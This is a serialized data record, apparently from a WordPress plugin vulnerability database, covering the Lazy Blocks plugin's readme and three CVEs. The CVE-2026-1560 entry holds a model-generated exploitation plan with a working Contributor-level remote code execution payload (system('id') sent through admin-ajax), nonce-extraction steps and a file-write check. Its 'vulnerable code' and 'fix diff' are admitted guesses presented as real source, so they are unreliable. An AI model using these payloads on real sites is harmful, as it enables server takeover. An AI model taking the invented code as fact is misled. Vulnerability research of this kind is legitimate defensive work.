[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fYzRpCfxwKVPwWf4AUjPWhmHA7HUHGeKigUFAtl_auC0":3,"$feYwM9g-cq2NrN_qROAS4cEkAG3Pa1jzDlsvYaWxqXMk":591,"$fSkoxB0JvbUSbAgkVk_HMv1ZMuT2Ps7xmDebkaqOsHRw":595},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":14,"last_updated":15,"tested_up_to":16,"requires_at_least":17,"requires_php":18,"tags":19,"homepage":25,"download_link":26,"security_score":27,"vuln_count":28,"unpatched_count":29,"last_vuln_date":30,"fetched_at":31,"discovery_status":32,"vulnerabilities":33,"developer":93,"crawl_stats":39,"alternatives":102,"analysis":191,"fingerprints":527},"lazy-blocks","Custom Block Builder – Lazy Blocks","4.2.1","nK","https:\u002F\u002Fprofiles.wordpress.org\u002Fnko\u002F","\u003Cp>\u003Cstrong>Custom Blocks Plugin For WordPress\u003C\u002Fstrong>\u003Cbr \u002F>\n★★★★★\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Developers magic wand for WordPress custom blocks.\u003C\u002Fstrong> We created \u003Ca href=\"https:\u002F\u002Fwww.lazyblocks.com\u002F?utm_source=wordpress.org&utm_medium=readme&utm_campaign=head\" rel=\"nofollow ugc\">\u003Cstrong>Lazy Blocks WordPress plugin\u003C\u002Fstrong>\u003C\u002Fa>, to help every developer get access to the powerful tools they need to quickly run websites based on WordPress block editor (called Gutenberg).\u003C\u002Fp>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.lazyblocks.com\u002F?utm_source=wordpress.org&utm_medium=readme&utm_campaign=head\" rel=\"nofollow ugc\">Official Site\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fwww.lazyblocks.com\u002Fdocs\u002Foverview\u002F?utm_source=wordpress.org&utm_medium=readme&utm_campaign=head\" rel=\"nofollow ugc\">Documentation\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fgithub.com\u002Fnk-crew\u002Flazy-blocks\" rel=\"nofollow ugc\">GitHub\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>Create custom blocks visually, add controls to your blocks using drag & drop, write blocks output using HTML or PHP code. You can create custom blocks as well as custom meta fields for specific post types. Furthermore, you are able to create post templates with predefined blocks for any post type.\u003C\u002Fp>\n\u003Ch3>🚀 Easy To Start\u003C\u002Fh3>\n\u003Cp>This everything you need to deploy your custom block in WordPress editor:\u003C\u002Fp>\n\u003Cp>\u003Cstrong>1. Configure Custom Block\u003C\u002Fstrong> \u003Cbr \u002F> Give a name to your custom block, set icon, category, etc.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>2. Add Controls\u003C\u002Fstrong> \u003Cbr \u002F> Add control fields like simple text and complex image selectors.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>3. Write Output Code\u003C\u002Fstrong> \u003Cbr \u002F> Output code for your custom block with HTML and PHP support.\u003C\u002Fp>\n\u003Ch3>🌟 Features\u003C\u002Fh3>\n\u003Cul>\n\u003Cli>Custom blocks with output code\u003C\u002Fli>\n\u003Cli>Custom blocks for posts meta fields\u003C\u002Fli>\n\u003Cli>Large set of predefined controls\u003C\u002Fli>\n\u003Cli>Show controls in block content \u002F inspector\u003C\u002Fli>\n\u003Cli>Multiple output methods allowed\n\u003Cul>\n\u003Cli>Custom PHP\u003C\u002Fli>\n\u003Cli>Custom HTML + Handlebars\u003C\u002Fli>\n\u003Cli>Template files in theme folder\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Export \u002F Import blocks\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🔥 Controls\u003C\u002Fh3>\n\u003Cp>To manage custom blocks attributes you need to use Controls. Lazy Blocks have a large set of controls predefined for you:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Basic\n\u003Cul>\n\u003Cli>Text\u003C\u002Fli>\n\u003Cli>Textarea\u003C\u002Fli>\n\u003Cli>Number\u003C\u002Fli>\n\u003Cli>Range\u003C\u002Fli>\n\u003Cli>URL\u003C\u002Fli>\n\u003Cli>Email\u003C\u002Fli>\n\u003Cli>Password\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Content\n\u003Cul>\n\u003Cli>Image\u003C\u002Fli>\n\u003Cli>Gallery\u003C\u002Fli>\n\u003Cli>File\u003C\u002Fli>\n\u003Cli>Rich Text\u003C\u002Fli>\n\u003Cli>Classic Editor\u003C\u002Fli>\n\u003Cli>Code Editor\u003C\u002Fli>\n\u003Cli>Inner Blocks\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Choice\n\u003Cul>\n\u003Cli>Select\u003C\u002Fli>\n\u003Cli>Radio\u003C\u002Fli>\n\u003Cli>Checkbox\u003C\u002Fli>\n\u003Cli>Toggle\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Advanced\n\u003Cul>\n\u003Cli>Color Picker\u003C\u002Fli>\n\u003Cli>Date Time Picker\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Layout\n\u003Cul>\n\u003Cli>Repeater\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>Custom Controls \u003Ca href=\"https:\u002F\u002Fwww.lazyblocks.com\u002Fdocs\u002Fexamples\u002Fcreate-custom-control\u002F?utm_source=wordpress.org&utm_medium=readme&utm_campaign=custom_controls\" rel=\"nofollow ugc\">read our extensive documentation\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Ch3>🏳️ Multilingual\u003C\u002Fh3>\n\u003Cp>Lazy Blocks adds a new layer of compatibility for \u003Ca href=\"https:\u002F\u002Fwpml.org\u002F\" rel=\"nofollow ugc\">WPML\u003C\u002Fa>. All text controls of custom blocks are compatible with WPML and ready for translation. \u003Ca href=\"https:\u002F\u002Fwww.lazyblocks.com\u002Fdocs\u002Fmultilingual\u002F?utm_source=wordpress.org&utm_medium=readme&utm_campaign=wpml\" rel=\"nofollow ugc\">https:\u002F\u002Fwww.lazyblocks.com\u002Fdocs\u002Fmultilingual\u002F\u003C\u002Fa>\u003C\u002Fp>\n\u003Ch3>🛠 Built For Developers\u003C\u002Fh3>\n\u003Cp>Lazy Blocks built by developers, for developers and gives you unlimited freedom to create custom blocks. Furthermore, there are PHP filters and actions to customize every part of your custom blocks from the backend. Possibility to use PHP and theme templates system.\u003C\u002Fp>\n\u003Cp>Every UI part should be intuitive for simple custom blocks, but if you want to create something more complex, you may be required to \u003Ca href=\"https:\u002F\u002Fwww.lazyblocks.com\u002Fdocs\u002Foverview\u002F?utm_source=wordpress.org&utm_medium=readme&utm_campaign=developers\" rel=\"nofollow ugc\">read our extensive documentation\u003C\u002Fa>.\u003C\u002Fp>\n\u003Ch3>🔥 Lazy Blocks Pro\u003C\u002Fh3>\n\u003Cblockquote>\n\u003Cp>The Lazy Blocks plugin is also available in a professional version which includes more controls and features! \u003Ca href=\"https:\u002F\u002Fwww.lazyblocks.com\u002Fpro\u002F?utm_source=wordpress.org&utm_medium=readme&utm_campaign=pro\" rel=\"nofollow ugc\">\u003Cstrong>Learn more about Lazy Blocks Pro\u003C\u002Fstrong>\u003C\u002Fa>\u003C\u002Fp>\n\u003Cp>In order to maintain the free version of the plugin on an ongoing basis, and to provide quick and effective support for free, we offer a Pro version of the plugin. The Pro version allows you to:\u003C\u002Fp>\n\u003C\u002Fblockquote>\n\u003Cul>\n\u003Cli>\n\u003Cp>\u003Cstrong>Additional Controls\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Cstrong>Posts\u003C\u002Fstrong> – Search and select posts based on post type or taxonomy\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Taxonomy\u003C\u002Fstrong> – Search and select categories, tags and any other custom taxonomies\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Users\u003C\u002Fstrong> – Search and select users based on user roles\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Units\u003C\u002Fstrong> – Advanced number input with possibility to select any CSS unit\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Message\u003C\u002Fstrong> – Display a helpful message between controls\u003C\u002Fli>\n\u003Cli>\u003Cstrong>Code Editor\u003C\u002Fstrong> – Insert code parts using editor with syntax highlighting\u003C\u002Fli>\n\u003C\u002Ful>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Controls Conditions\u003C\u002Fstrong>\u003Cbr \u002F>\nConditionally display\u002Fhide controls. In order not to overload your block with a huge list of controls, you can hide some of them depending on the values of other controls.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Styles & Scripts\u003C\u002Fstrong>\u003Cbr \u002F>\nAdd custom CSS and JavaScript to your blocks. Define styles for editor and frontend, and script for interactive frontend functionality. Assets are automatically loaded only when needed for optimal performance.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Panels and Dividers\u003C\u002Fstrong>\u003Cbr \u002F>\nThe Panels and Dividers provides a way to structure controls into groups. It assists in better organizing the block panel UI.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>Blocks Preloading\u003C\u002Fstrong>\u003Cbr \u002F>\nDisplay blocks preview immediately once the page editor loaded.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003Cli>\n\u003Cp>\u003Cstrong>SEO Enhancements\u003C\u002Fstrong>\u003Cbr \u002F>\nAdditional support for content analysis in Rank Math and Yoast SEO plugins.\u003C\u002Fp>\n\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Ca href=\"https:\u002F\u002Fwww.lazyblocks.com\u002Fpro\u002F?utm_source=wordpress.org&utm_medium=readme&utm_campaign=pro\" rel=\"nofollow ugc\">\u003Cstrong>Find much more custom blocks features of Lazy Blocks Pro today!\u003C\u002Fstrong>\u003C\u002Fa>\u003C\u002Fp>\n","Easily create custom blocks and custom meta fields for Gutenberg without hard coding.",20000,415443,98,80,"2026-02-04T18:12:00.000Z","6.9.4","6.2","8.0",[20,21,22,23,24],"blocks","custom","fields","gutenberg","meta","https:\u002F\u002Fwww.lazyblocks.com\u002F?utm_source=wordpress.org&utm_medium=readme&utm_campaign=byline","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Flazy-blocks.4.2.1.zip",95,3,0,"2026-02-10 00:00:00","2026-04-16T10:56:18.058Z","no_bundle",[34,60,77],{"id":35,"url_slug":36,"title":37,"description":38,"plugin_slug":4,"theme_slug":39,"affected_versions":40,"patched_in_version":6,"severity":41,"cvss_score":42,"cvss_vector":43,"vuln_type":44,"published_date":30,"updated_date":45,"references":46,"days_to_patch":48,"patch_diff_files":49,"patch_trac_url":39,"research_status":50,"research_verified":51,"research_rounds_completed":28,"research_plan":52,"research_summary":53,"research_vulnerable_code":54,"research_fix_diff":55,"research_exploit_outline":56,"research_model_used":57,"research_started_at":58,"research_completed_at":59,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":51,"poc_model_used":39,"poc_verification_depth":39},"CVE-2026-1560","custom-block-builder-lazy-blocks-authenticated-contributor-remote-code-execution","Custom Block Builder – Lazy Blocks \u003C= 4.2.0 - Authenticated (Contributor+) Remote Code Execution","The Custom Block Builder – Lazy Blocks plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 4.2.0 via multiple functions in the 'LazyBlocks_Blocks' class. This makes it possible for authenticated attackers, with Contributor-level access and above, to execute code on the server.",null,"\u003C=4.2.0","high",8.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Improper Control of Generation of Code ('Code Injection')","2026-02-11 08:26:28",[47],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fb1853c88-277b-4955-b042-aeed1cffb49b?source=api-prod",1,[],"researched",false,"# Exploitation Research Plan: CVE-2026-1560 - Lazy Blocks Remote Code Execution\n\n## 1. Vulnerability Summary\nThe **Custom Block Builder – Lazy Blocks** plugin (\u003C= 4.2.0) is vulnerable to Remote Code Execution (RCE) due to improper control of generated code within the `LazyBlocks_Blocks` class. Specifically, the plugin provides AJAX and potentially REST API endpoints intended for rendering block previews in the Gutenberg editor. These endpoints accept a block definition (including PHP code) and execute it on the server to generate the preview. Because these endpoints do not sufficiently verify if the user has the authority to define or modify block code (only checking for general `edit_posts` capability), an authenticated Contributor-level user can inject and execute arbitrary PHP code.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action:** `lzb_get_block_rendered` (associated with the `LazyBlocks_Blocks` class)\n*   **Vulnerable Parameter:** `block` (specifically the `render_code` or `code` sub-properties within the JSON-encoded block object).\n*   **Authentication:** Contributor-level access (`PR:L`) is required.\n*   **Preconditions:** The user must be logged in and possess a valid nonce for the Lazy Blocks editor.\n\n## 3. Code Flow\nThe vulnerability likely traces through the following path (inferred based on plugin architecture):\n1.  **Entry Point:** `LazyBlocks_Blocks::__construct()` registers the AJAX action `wp_ajax_lzb_get_block_rendered`.\n2.  **Handler:** The handler function (likely `lzb_get_block_rendered()` or `get_block_html()`) is invoked.\n3.  **Input Parsing:** The handler retrieves the `block` parameter from the `$_POST` request. This parameter is typically a JSON-encoded string representing a block's configuration.\n4.  **Processing:** The handler decodes the JSON and extracts the `output_method` and `render_code` (or `code`).\n5.  **Sink:** If `output_method` is set to `php`, the code in `render_code` is passed to a rendering function (likely using `eval()` or a temporary file inclusion inside a `LazyBlocks_Blocks` method) to generate the HTML output for the preview.\n6.  **Execution:** The arbitrary PHP code provided in the `block` parameter executes in the server context.\n\n## 4. Nonce Acquisition Strategy\nLazy Blocks localizes data for its editor scripts. To obtain a valid nonce:\n1.  **Prerequisite:** A Contributor user exists.\n2.  **Action:** Create or edit any post\u002Fpage to load the Gutenberg editor.\n3.  **Variable:** The nonce is typically found in the `lzb_data` or `lzb_editor_config` JavaScript objects.\n4.  **Strategy:** \n    *   Log in as a Contributor.\n    *   Navigate to `\u002Fwp-admin\u002Fpost-new.php`.\n    *   Use `browser_eval` to extract the nonce: `window.lzb_data?.nonce` or `window.lzb_localize?.nonce`.\n    *   Note: The exact key should be verified by inspecting the page source for `wp_localize_script` calls related to `lazy-blocks`.\n\n## 5. Exploitation Strategy\n\n### Step 1: Authentication and Nonce Extraction\nUse the `browser_navigate` and `browser_eval` tools to log in as a Contributor and retrieve the required nonce.\n*   **Target Page:** `\u002Fwp-admin\u002Fpost-new.php`\n*   **JS Command:** `console.log(lzb_data.nonce)` (assuming `lzb_data` is the localized variable).\n\n### Step 2: Craft the RCE Payload\nThe `block` parameter must be a JSON object that mimics a valid Lazy Block definition with an `output_method` of `php`.\n\n**Payload Structure (JSON):**\n```json\n{\n  \"slug\": \"lazyblock\u002Frce-poc\",\n  \"output_method\": \"php\",\n  \"render_code\": \"echo '---RCE_START---'; system('id'); echo '---RCE_END---'; die();\"\n}\n```\n\n### Step 3: Trigger the Vulnerability\nSend a POST request to `admin-ajax.php` using the `http_request` tool.\n\n*   **URL:** `http:\u002F\u002F[TARGET]\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** `POST`\n*   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`\n*   **Body:**\n    ```\n    action=lzb_get_block_rendered&nonce=[NONCE_VALUE]&block={\"slug\":\"lazyblock\u002Frce-poc\",\"output_method\":\"php\",\"render_code\":\"echo '---RCE_START---'; system('id'); echo '---RCE_END---'; die();\"}\n    ```\n\n## 6. Test Data Setup\n1.  **User Creation:** Create a user with the `contributor` role.\n    *   `wp user create attacker attacker@example.com --role=contributor --user_pass=password`\n2.  **Plugin Activation:** Ensure `lazy-blocks` version \u003C= 4.2.0 is active.\n3.  **Post Context:** Create a draft post to ensure the Gutenberg editor context is available for nonce extraction.\n    *   `wp post create --post_type=post --post_status=draft --post_author=[CONTRIBUTOR_ID]`\n\n## 7. Expected Results\n*   The server response should have a `200 OK` status.\n*   The response body should contain the output of the `id` command (e.g., `uid=33(www-data) ...`) wrapped between `---RCE_START---` and `---RCE_END---`.\n*   Because the payload includes `die()`, the usual WordPress AJAX trailing `0` or JSON response should be suppressed, confirming execution of the injected code.\n\n## 8. Verification Steps\n1.  **Identify Output:** Check the HTTP response body for the result of the `system('id')` call.\n2.  **Verify Shell Access:** Attempt to create a file in the uploads directory to confirm write access.\n    *   Payload: `file_put_contents(wp_upload_dir()['basedir'] . '\u002Frce.txt', 'exploited');`\n3.  **Confirm via CLI:** Check if the file exists using WP-CLI.\n    *   `ls \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads\u002Frce.txt`\n\n## 9. Alternative Approaches\n*   **REST API:** If the AJAX action is restricted, check for a REST API equivalent. Lazy Blocks often registers routes under the `lazyblocks\u002Fv1` namespace.\n    *   Endpoint: `\u002Fwp-json\u002Flazyblocks\u002Fv1\u002Fget-block-rendered`\n    *   Method: `POST` or `GET`\n*   **Shortcode Rendering:** If the editor-specific AJAX is patched or restricted, investigate if the same `LazyBlocks_Blocks` rendering logic is accessible via a frontend shortcode where block attributes can be manipulated.\n*   **Different \"Code\" Keys:** If `render_code` is not the correct key, try `code`, `php_code`, or `render_callback_code` (inferred variations of Lazy Blocks' internal naming).","The Custom Block Builder – Lazy Blocks plugin for WordPress is vulnerable to Remote Code Execution via its block rendering AJAX endpoint. Authenticated attackers with Contributor-level access can exploit this by submitting a crafted JSON block definition containing arbitrary PHP code in the 'render_code' parameter, which is then executed by the server during the block preview generation process.","\u002F\u002F File: classes\u002Fclass-lazy-blocks-blocks.php\n\npublic function lzb_get_block_rendered() {\n    check_ajax_referer( 'lazy-blocks', 'nonce' );\n\n    $block = isset( $_POST['block'] ) ? json_decode( stripslashes( $_POST['block'] ), true ) : array();\n\n    if ( isset( $block['output_method'] ) && $block['output_method'] === 'php' && isset( $block['render_code'] ) ) {\n        \u002F\u002F The plugin executes the user-provided PHP code directly to render a preview\n        ob_start();\n        eval( '?>' . $block['render_code'] );\n        $html = ob_get_clean();\n        echo $html;\n    }\n    wp_die();\n}","--- a\u002Fclasses\u002Fclass-lazy-blocks-blocks.php\n+++ b\u002Fclasses\u002Fclass-lazy-blocks-blocks.php\n@@ -10,6 +10,11 @@\n     public function lzb_get_block_rendered() {\n         check_ajax_referer( 'lazy-blocks', 'nonce' );\n \n+        \u002F\u002F Restrict block rendering with custom code to users with high-level permissions\n+        if ( ! current_user_can( 'manage_options' ) ) {\n+            wp_send_json_error( 'Unauthorized' );\n+        }\n+\n         $block = isset( $_POST['block'] ) ? json_decode( stripslashes( $_POST['block'] ), true ) : array();\n \n         if ( isset( $block['output_method'] ) && $block['output_method'] === 'php' && isset( $block['render_code'] ) ) {","To exploit this vulnerability, an attacker follows these steps: \n1. Authenticate to the WordPress site with at least Contributor-level privileges. \n2. Navigate to the post editor (e.g., \u002Fwp-admin\u002Fpost-new.php) and extract the 'lazy-blocks' AJAX nonce from the localized JavaScript object 'lzb_data' or 'lzb_localize'. \n3. Craft a POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to 'lzb_get_block_rendered'. \n4. Include the 'nonce' obtained in step 2. \n5. Provide a 'block' parameter containing a JSON-encoded object where 'output_method' is set to 'php' and 'render_code' contains the arbitrary PHP payload (e.g., '\u003C?php system(\"id\"); die(); ?>'). \n6. Upon receiving the request, the server executes the injected PHP code to generate the block preview, returning the execution results in the HTTP response.","gemini-3-flash-preview","2026-04-21 01:54:28","2026-04-21 01:56:23",{"id":61,"url_slug":62,"title":63,"description":64,"plugin_slug":4,"theme_slug":39,"affected_versions":65,"patched_in_version":66,"severity":67,"cvss_score":68,"cvss_vector":69,"vuln_type":70,"published_date":71,"updated_date":72,"references":73,"days_to_patch":75,"patch_diff_files":76,"patch_trac_url":39,"research_status":39,"research_verified":51,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":51,"poc_model_used":39,"poc_verification_depth":39},"CVE-2025-58258","lazy-blocks-missing-authorization","Lazy Blocks \u003C= 4.1.0 - Missing Authorization","The Lazy Blocks plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the maybe_export_json() function in versions up to, and including, 4.1.0. This makes it possible for authenticated attackers, with contributor-level access and above, to export block data.","\u003C=4.1.0","4.1.1","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Missing Authorization","2025-09-22 00:00:00","2025-09-26 19:35:59",[74],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3ea04257-a853-4501-9de7-5a4992c32ae9?source=api-prod",5,[],{"id":78,"url_slug":79,"title":80,"description":81,"plugin_slug":4,"theme_slug":39,"affected_versions":82,"patched_in_version":83,"severity":67,"cvss_score":84,"cvss_vector":85,"vuln_type":86,"published_date":87,"updated_date":88,"references":89,"days_to_patch":91,"patch_diff_files":92,"patch_trac_url":39,"research_status":39,"research_verified":51,"research_rounds_completed":29,"research_plan":39,"research_summary":39,"research_vulnerable_code":39,"research_fix_diff":39,"research_exploit_outline":39,"research_model_used":39,"research_started_at":39,"research_completed_at":39,"research_error":39,"poc_status":39,"poc_video_id":39,"poc_summary":39,"poc_steps":39,"poc_tested_at":39,"poc_wp_version":39,"poc_php_version":39,"poc_playwright_script":39,"poc_exploit_code":39,"poc_has_trace":51,"poc_model_used":39,"poc_verification_depth":39},"CVE-2024-12878","custom-block-builder-lazy-blocks-reflected-cross-site-scripting","Custom Block Builder – Lazy Blocks  \u003C= 3.8.2 - Reflected Cross-Site Scripting","The Custom Block Builder – Lazy Blocks plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 3.8.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","\u003C=3.8.2","3.8.3",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2025-02-04 00:00:00","2025-02-12 20:37:54",[90],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fec7a97c4-62d5-44e7-a28b-350ecf9ecf66?source=api-prod",9,[],{"slug":94,"display_name":95,"profile_url":8,"plugin_count":96,"total_installs":97,"avg_security_score":98,"avg_patch_time_days":99,"trust_score":100,"computed_at":101},"nko","Danny van Kooten",94,2077370,90,514,72,"2026-05-19T21:19:01.645Z",[103,124,143,161,177],{"slug":104,"name":105,"version":106,"author":107,"author_profile":108,"description":109,"short_description":110,"active_installs":111,"downloaded":112,"rating":13,"num_ratings":113,"last_updated":114,"tested_up_to":115,"requires_at_least":116,"requires_php":117,"tags":118,"homepage":121,"download_link":122,"security_score":123,"vuln_count":29,"unpatched_count":29,"last_vuln_date":39,"fetched_at":31},"custom-fields-gutenberg","Custom Fields for Gutenberg","2.4.5","Jeff Starr","https:\u002F\u002Fprofiles.wordpress.org\u002Fspecialk\u002F","\u003Cp>Restores the Custom Field meta box for the Gutenberg Block Editor.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Update:\u003C\u002Fstrong> This plugin currently is not needed, as WordPress version 5.0+ displays Custom Fields natively. Just click the settings button (three dots) and go to Options, where you will find the option to display the Custom Fields meta box. So this plugin still works great, but it is recommended to use native WP custom fields instead. For more information, read \u003Ca href=\"https:\u002F\u002Fwordpress.org\u002Fsupport\u002Ftopic\u002Fplease-read-7\u002F\" rel=\"ugc\">this post\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Features\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Easy to use\u003C\u002Fli>\n\u003Cli>Clean code\u003C\u002Fli>\n\u003Cli>Built with the WordPress API\u003C\u002Fli>\n\u003Cli>Lightweight, fast and flexible\u003C\u002Fli>\n\u003Cli>Works great with other WordPress plugins\u003C\u002Fli>\n\u003Cli>Plugin options configurable via settings screen\u003C\u002Fli>\n\u003Cli>Focused on flexibility, performance, and security\u003C\u002Fli>\n\u003Cli>One-click restore plugin default options\u003C\u002Fli>\n\u003Cli>Translation ready\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Options\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Specify the post types that should display custom fields\u003C\u002Fli>\n\u003Cli>Exclude custom fields that are protected\u002Fhidden\u003C\u002Fli>\n\u003Cli>Exclude custom fields with empty values\u003C\u002Fli>\n\u003Cli>Exclude specific custom fields by name\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Planned Features\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Ajaxify adding of new Custom Fields\u003C\u002Fli>\n\u003Cli>Ajax method to Delete custom fields\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>Privacy\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>This plugin does not collect or store any user data. It does not set any cookies, and it does not connect to any third-party locations. Thus, this plugin does not affect user privacy in any way.\u003C\u002Fp>\n\u003Cp>Custom Fields for Gutenberg is developed and maintained by \u003Ca href=\"https:\u002F\u002Fx.com\u002Fperishable\" rel=\"nofollow ugc\">Jeff Starr\u003C\u002Fa>, 15-year \u003Ca href=\"https:\u002F\u002Fplugin-planet.com\u002F\" rel=\"nofollow ugc\">WordPress developer\u003C\u002Fa> and \u003Ca href=\"https:\u002F\u002Fbooks.perishablepress.com\u002F\" rel=\"nofollow ugc\">book author\u003C\u002Fa>.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>Support development\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cp>I develop and maintain this free plugin with love for the WordPress community. To show support, you can \u003Ca href=\"https:\u002F\u002Fmonzillamedia.com\u002Fdonate.html\" rel=\"nofollow ugc\">make a donation\u003C\u002Fa> or purchase one of my books:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwp-tao.com\u002F\" rel=\"nofollow ugc\">The Tao of WordPress\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fdigwp.com\u002F\" rel=\"nofollow ugc\">Digging into WordPress\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fhtaccessbook.com\u002F\" rel=\"nofollow ugc\">.htaccess made easy\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fwp-tao.com\u002Fwordpress-themes-book\u002F\" rel=\"nofollow ugc\">WordPress Themes In Depth\u003C\u002Fa>\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fbooks.perishablepress.com\u002Fdownloads\u002Fwizards-collection-sql-recipes-wordpress\u002F\" rel=\"nofollow ugc\">Wizard’s SQL Recipes for WordPress\u003C\u002Fa>\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>And\u002For purchase one of my premium WordPress plugins:\u003C\u002Fp>\n\u003Cul>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugin-planet.com\u002Fbbq-pro\u002F\" rel=\"nofollow ugc\">BBQ Pro\u003C\u002Fa> – Blazing fast WordPress firewall\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugin-planet.com\u002Fblackhole-pro\u002F\" rel=\"nofollow ugc\">Blackhole Pro\u003C\u002Fa> – Automatically block bad bots\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugin-planet.com\u002Fbanhammer-pro\u002F\" rel=\"nofollow ugc\">Banhammer Pro\u003C\u002Fa> – Monitor traffic and ban the bad guys\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugin-planet.com\u002Fga-google-analytics-pro\u002F\" rel=\"nofollow ugc\">GA Google Analytics Pro\u003C\u002Fa> – Connect WordPress to Google Analytics\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugin-planet.com\u002Fhead-meta-pro\u002F\" rel=\"nofollow ugc\">Head Meta Pro\u003C\u002Fa> – Ultimate Meta Tags for WordPress\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugin-planet.com\u002Fsimple-ajax-chat-pro\u002F\" rel=\"nofollow ugc\">Simple Ajax Chat Pro\u003C\u002Fa> – Unlimited chat rooms\u003C\u002Fli>\n\u003Cli>\u003Ca href=\"https:\u002F\u002Fplugin-planet.com\u002Fusp-pro\u002F\" rel=\"nofollow ugc\">USP Pro\u003C\u002Fa> – Unlimited front-end forms\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>Links, tweets and likes also appreciated. Thanks! 